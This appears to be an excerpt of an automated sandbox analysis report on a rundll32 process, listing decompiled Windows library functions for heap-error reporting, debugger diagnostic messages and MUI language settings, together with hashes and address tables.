                                                                                                                • Instruction ID: 21e21bedac9f6b3252126388efbaff3614e5ace59a3e5aefd394c44b10fee835
                                                                                                                • Opcode Fuzzy Hash: ba33e17987b3b042a61960e4377636ba2bbf7f1f6027373fe847ed05d9128245
                                                                                                                • Instruction Fuzzy Hash: D8D05E72AD02093BF620B7F59D42F67328D8B04694F064064FA0CE62C2DD60F50046A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0444967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 463ef4e8a78fcbf3c008467904b275bf9113363061ecfb6443b8da9e15c76368
                                                                                                                • Instruction ID: e6a3cbde82082f0cc2439cbd04084347f1ad0a1deea05f807a84f5da101a9710
                                                                                                                • Opcode Fuzzy Hash: 463ef4e8a78fcbf3c008467904b275bf9113363061ecfb6443b8da9e15c76368
                                                                                                                • Instruction Fuzzy Hash: 5BB04CB19424C586FE52D76046086177910ABD0745F16C056D1020651A4778D091F5B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 044BB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044BB38F
                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 044BB305
                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 044BB39B
                                                                                                                • write to, xrefs: 044BB4A6
                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044BB3D6
                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 044BB484
                                                                                                                • *** enter .exr %p for the exception record, xrefs: 044BB4F1
                                                                                                                • The instruction at %p tried to %s , xrefs: 044BB4B6
                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 044BB323
                                                                                                                • *** enter .cxr %p for the context, xrefs: 044BB50D
                                                                                                                • The critical section is owned by thread %p., xrefs: 044BB3B9
                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 044BB48F
                                                                                                                • an invalid address, %p, xrefs: 044BB4CF
                                                                                                                • The resource is owned shared by %d threads, xrefs: 044BB37E
                                                                                                                • read from, xrefs: 044BB4AD, 044BB4B2
                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 044BB3C5
                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 044BB2DC
                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 044BB314
                                                                                                                • *** then kb to get the faulting stack, xrefs: 044BB51C
                                                                                                                • This failed because of error %Ix., xrefs: 044BB446
                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 044BB47D
                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 044BB374
                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 044BB432
                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 044BB352
                                                                                                                • <unknown>, xrefs: 044BB27E, 044BB2D1, 044BB350, 044BB399, 044BB417, 044BB48E
                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 044BB53F
                                                                                                                • *** Inpage error in %ws:%s, xrefs: 044BB418
                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 044BB2F3
                                                                                                                • a NULL pointer, xrefs: 044BB4E0
                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 044BB476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                • API String ID: 0-108210295
                                                                                                                • Opcode ID: a816ccedc1c09dd04ba9b5c2128c1e40660ef20f8125228521cb7d42d3dfb32d
                                                                                                                • Instruction ID: 7e8d88f1163f409b8fd9170db96ec33bfbf28e3f441bd476ed2449c448735087
                                                                                                                • Opcode Fuzzy Hash: a816ccedc1c09dd04ba9b5c2128c1e40660ef20f8125228521cb7d42d3dfb32d
                                                                                                                • Instruction Fuzzy Hash: 22811735A00200FFEF265B06DC4ADAB3F66EF46755F00408BF6451B612E271B912EAB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E044C1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x43e48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0440B150();
				} else {
					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x44f589c);
				E0440B150("Heap error detected at %p (heap handle %p)\n",  *0x44f58a0);
				_t27 =  *0x44f5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M044C1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0440B150();
				} else {
					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0440B150("Error code: %d - %s\n",  *0x44f5898);
				_t113 =  *0x44f58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0440B150();
					} else {
						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0440B150("Parameter1: %p\n",  *0x44f58a4);
				}
				_t115 =  *0x44f58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0440B150();
					} else {
						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0440B150("Parameter2: %p\n",  *0x44f58a8);
				}
				_t117 =  *0x44f58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0440B150();
					} else {
						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0440B150("Parameter3: %p\n",  *0x44f58ac);
				}
				_t119 =  *0x44f58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0440B150();
					} else {
						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x44f58b4);
					E0440B150("Last known valid blocks: before - %p, after - %p\n",  *0x44f58b0);
				} else {
					_t120 =  *0x44f58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0440B150();
				} else {
					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0440B150("Stack trace available at %p\n", 0x44f58c0);
			}











                                                                                                                0x044c1c10
                                                                                                                0x044c1c16
                                                                                                                0x044c1c1e
                                                                                                                0x044c1c3d
                                                                                                                0x044c1c3e
                                                                                                                0x044c1c20
                                                                                                                0x044c1c35
                                                                                                                0x044c1c3a
                                                                                                                0x044c1c44
                                                                                                                0x044c1c55
                                                                                                                0x044c1c5a
                                                                                                                0x044c1c65
                                                                                                                0x044c1c67
                                                                                                                0x00000000
                                                                                                                0x044c1c6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044c1c67
                                                                                                                0x044c1cdc
                                                                                                                0x044c1ce5
                                                                                                                0x044c1d04
                                                                                                                0x044c1d05
                                                                                                                0x044c1ce7
                                                                                                                0x044c1cfc
                                                                                                                0x044c1d01
                                                                                                                0x044c1d0b
                                                                                                                0x044c1d17
                                                                                                                0x044c1d1f
                                                                                                                0x044c1d25
                                                                                                                0x044c1d30
                                                                                                                0x044c1d4f
                                                                                                                0x044c1d50
                                                                                                                0x044c1d32
                                                                                                                0x044c1d47
                                                                                                                0x044c1d4c
                                                                                                                0x044c1d61
                                                                                                                0x044c1d67
                                                                                                                0x044c1d68
                                                                                                                0x044c1d6e
                                                                                                                0x044c1d79
                                                                                                                0x044c1d98
                                                                                                                0x044c1d99
                                                                                                                0x044c1d7b
                                                                                                                0x044c1d90
                                                                                                                0x044c1d95
                                                                                                                0x044c1daa
                                                                                                                0x044c1db0
                                                                                                                0x044c1db1
                                                                                                                0x044c1db7
                                                                                                                0x044c1dc2
                                                                                                                0x044c1de1
                                                                                                                0x044c1de2
                                                                                                                0x044c1dc4
                                                                                                                0x044c1dd9
                                                                                                                0x044c1dde
                                                                                                                0x044c1df3
                                                                                                                0x044c1df9
                                                                                                                0x044c1dfa
                                                                                                                0x044c1e00
                                                                                                                0x044c1e0a
                                                                                                                0x044c1e13
                                                                                                                0x044c1e32
                                                                                                                0x044c1e33
                                                                                                                0x044c1e15
                                                                                                                0x044c1e2a
                                                                                                                0x044c1e2f
                                                                                                                0x044c1e39
                                                                                                                0x044c1e4a
                                                                                                                0x044c1e02
                                                                                                                0x044c1e02
                                                                                                                0x044c1e08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044c1e08
                                                                                                                0x044c1e5b
                                                                                                                0x044c1e7a
                                                                                                                0x044c1e7b
                                                                                                                0x044c1e5d
                                                                                                                0x044c1e72
                                                                                                                0x044c1e77
                                                                                                                0x044c1e95

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                • API String ID: 0-2897834094
                                                                                                                • Opcode ID: 59ce93d68d423268eb08d28857d6671991fc47bc84113ec4b0c4aaddc692bfc7
                                                                                                                • Instruction ID: 43edbf7b885ec8e71f3ce08afeed1a356dcf046aa863610e285fdff03a66b33e
                                                                                                                • Opcode Fuzzy Hash: 59ce93d68d423268eb08d28857d6671991fc47bc84113ec4b0c4aaddc692bfc7
                                                                                                                • Instruction Fuzzy Hash: 1661D33A611584EFFB61AB85D886A3173A4EB04A31B4DD03FF5095F353D634BC61AE0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04413D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E04413D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04411B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04411B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04411B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04411B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04411B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04424620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0444F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04451370(_t276, 0x43e4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0444BB40(0,  &_v68, _t170);
									if(L044143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0444BB40(_t257,  &_v68, _t243);
								if(L044143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04451370(_t278, 0x43e4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04424620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0444F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04451370(_v16, 0x43e4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0444BB40(_t262,  &_v68, _t244);
								if(L044143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04451370(_t282, 0x43e4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0444BB40(_t262,  &_v68, _t201);
							if(L044143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04424620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0444F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04451370(_t280, 0x43e4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0444BB40(_t267,  &_v68, _t245);
							if(L044143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04451370(_t284, 0x43e4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0444BB40(_t267,  &_v68, _t224);
						if(L044143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                0x04413d3c
                                                                                                                0x04413d42
                                                                                                                0x04413d44
                                                                                                                0x04413d46
                                                                                                                0x04413d49
                                                                                                                0x04413d4c
                                                                                                                0x04413d4f
                                                                                                                0x04413d52
                                                                                                                0x04413d55
                                                                                                                0x04413d58
                                                                                                                0x04413d5b
                                                                                                                0x04413d5f
                                                                                                                0x04413d61
                                                                                                                0x04413d66
                                                                                                                0x04468213
                                                                                                                0x04468218
                                                                                                                0x04414085
                                                                                                                0x04414088
                                                                                                                0x0441408e
                                                                                                                0x04414094
                                                                                                                0x0441409a
                                                                                                                0x044140a0
                                                                                                                0x044140a6
                                                                                                                0x044140a9
                                                                                                                0x044140af
                                                                                                                0x044140b6
                                                                                                                0x044140bd
                                                                                                                0x044140bd
                                                                                                                0x04413d83
                                                                                                                0x0446821f
                                                                                                                0x04468229
                                                                                                                0x04468238
                                                                                                                0x04468238
                                                                                                                0x0446823d
                                                                                                                0x0446823d
                                                                                                                0x04413da0
                                                                                                                0x04413daf
                                                                                                                0x04413db5
                                                                                                                0x04413dba
                                                                                                                0x04413dba
                                                                                                                0x04413dd4
                                                                                                                0x04413e94
                                                                                                                0x04413eab
                                                                                                                0x04413f6d
                                                                                                                0x04413f84
                                                                                                                0x0441406b
                                                                                                                0x0441406b
                                                                                                                0x0441406e
                                                                                                                0x0441406e
                                                                                                                0x04414070
                                                                                                                0x04414074
                                                                                                                0x04468351
                                                                                                                0x04468351
                                                                                                                0x0441407a
                                                                                                                0x0441407f
                                                                                                                0x0446835d
                                                                                                                0x04468370
                                                                                                                0x04468377
                                                                                                                0x04468379
                                                                                                                0x0446837c
                                                                                                                0x0446837c
                                                                                                                0x0446835d
                                                                                                                0x00000000
                                                                                                                0x0441407f
                                                                                                                0x04413f8a
                                                                                                                0x04413f8d
                                                                                                                0x04413f90
                                                                                                                0x04413f95
                                                                                                                0x0446830d
                                                                                                                0x0446830f
                                                                                                                0x04413f9b
                                                                                                                0x04413fac
                                                                                                                0x04413fae
                                                                                                                0x04413fb1
                                                                                                                0x04413fb1
                                                                                                                0x04413fb6
                                                                                                                0x04468317
                                                                                                                0x0446831a
                                                                                                                0x00000000
                                                                                                                0x04413fbc
                                                                                                                0x04413fc1
                                                                                                                0x04413fc9
                                                                                                                0x04413fd7
                                                                                                                0x04413fda
                                                                                                                0x04413fdd
                                                                                                                0x04414021
                                                                                                                0x04414021
                                                                                                                0x04414029
                                                                                                                0x04414030
                                                                                                                0x04414044
                                                                                                                0x04414046
                                                                                                                0x04414046
                                                                                                                0x04414044
                                                                                                                0x04414049
                                                                                                                0x04468327
                                                                                                                0x04468334
                                                                                                                0x04468339
                                                                                                                0x0446833c
                                                                                                                0x0441404f
                                                                                                                0x0441404f
                                                                                                                0x0441404f
                                                                                                                0x04414051
                                                                                                                0x04414056
                                                                                                                0x04414063
                                                                                                                0x04414063
                                                                                                                0x04414068
                                                                                                                0x00000000
                                                                                                                0x04414068
                                                                                                                0x04413fdf
                                                                                                                0x04413fe2
                                                                                                                0x04413fe4
                                                                                                                0x04413fe7
                                                                                                                0x04413fef
                                                                                                                0x04414003
                                                                                                                0x04414005
                                                                                                                0x04414005
                                                                                                                0x0441400c
                                                                                                                0x04414013
                                                                                                                0x04414016
                                                                                                                0x04414017
                                                                                                                0x0441401b
                                                                                                                0x0441401e
                                                                                                                0x00000000
                                                                                                                0x0441401e
                                                                                                                0x04413fb6
                                                                                                                0x04413eb1
                                                                                                                0x04413eb4
                                                                                                                0x04413eb7
                                                                                                                0x04413ebc
                                                                                                                0x044682a9
                                                                                                                0x044682ab
                                                                                                                0x04413ec2
                                                                                                                0x04413ed3
                                                                                                                0x04413ed5
                                                                                                                0x04413ed8
                                                                                                                0x04413ed8
                                                                                                                0x04413edd
                                                                                                                0x044682b3
                                                                                                                0x044682b6
                                                                                                                0x00000000
                                                                                                                0x04413ee3
                                                                                                                0x04413ee8
                                                                                                                0x04413eed
                                                                                                                0x04413ef0
                                                                                                                0x04413ef3
                                                                                                                0x04413f02
                                                                                                                0x04413f05
                                                                                                                0x04413f08
                                                                                                                0x044682c0
                                                                                                                0x044682c3
                                                                                                                0x044682c5
                                                                                                                0x044682c8
                                                                                                                0x044682d0
                                                                                                                0x044682e4
                                                                                                                0x044682e6
                                                                                                                0x044682e6
                                                                                                                0x044682ed
                                                                                                                0x044682f4
                                                                                                                0x044682f7
                                                                                                                0x044682f8
                                                                                                                0x044682fc
                                                                                                                0x044682ff
                                                                                                                0x044682ff
                                                                                                                0x04413f0e
                                                                                                                0x04413f11
                                                                                                                0x04413f16
                                                                                                                0x04413f1d
                                                                                                                0x04413f31
                                                                                                                0x04468307
                                                                                                                0x04468307
                                                                                                                0x04413f31
                                                                                                                0x04413f39
                                                                                                                0x04413f48
                                                                                                                0x04413f4d
                                                                                                                0x04413f50
                                                                                                                0x04413f50
                                                                                                                0x04413f53
                                                                                                                0x04413f58
                                                                                                                0x04413f65
                                                                                                                0x04413f65
                                                                                                                0x04413f6a
                                                                                                                0x00000000
                                                                                                                0x04413f6a
                                                                                                                0x04413edd
                                                                                                                0x04413dda
                                                                                                                0x04413ddd
                                                                                                                0x04413de0
                                                                                                                0x04413de5
                                                                                                                0x04468245
                                                                                                                0x04413deb
                                                                                                                0x04413df7
                                                                                                                0x04413dfc
                                                                                                                0x04413dfe
                                                                                                                0x04413e01
                                                                                                                0x04413e01
                                                                                                                0x04413e06
                                                                                                                0x0446824d
                                                                                                                0x0446824f
                                                                                                                0x04468254
                                                                                                                0x00000000
                                                                                                                0x04413e0c
                                                                                                                0x04413e11
                                                                                                                0x04413e16
                                                                                                                0x04413e19
                                                                                                                0x04413e29
                                                                                                                0x04413e2c
                                                                                                                0x04413e2f
                                                                                                                0x0446825c
                                                                                                                0x0446825f
                                                                                                                0x04468261
                                                                                                                0x04468264
                                                                                                                0x0446826c
                                                                                                                0x04468280
                                                                                                                0x04468282
                                                                                                                0x04468282
                                                                                                                0x04468289
                                                                                                                0x04468290
                                                                                                                0x04468293
                                                                                                                0x04468294
                                                                                                                0x04468298
                                                                                                                0x0446829b
                                                                                                                0x0446829b
                                                                                                                0x04413e35
                                                                                                                0x04413e38
                                                                                                                0x04413e3d
                                                                                                                0x04413e44
                                                                                                                0x04413e58
                                                                                                                0x044682a3
                                                                                                                0x044682a3
                                                                                                                0x04413e58
                                                                                                                0x04413e60
                                                                                                                0x04413e6f
                                                                                                                0x04413e74
                                                                                                                0x04413e77
                                                                                                                0x04413e77
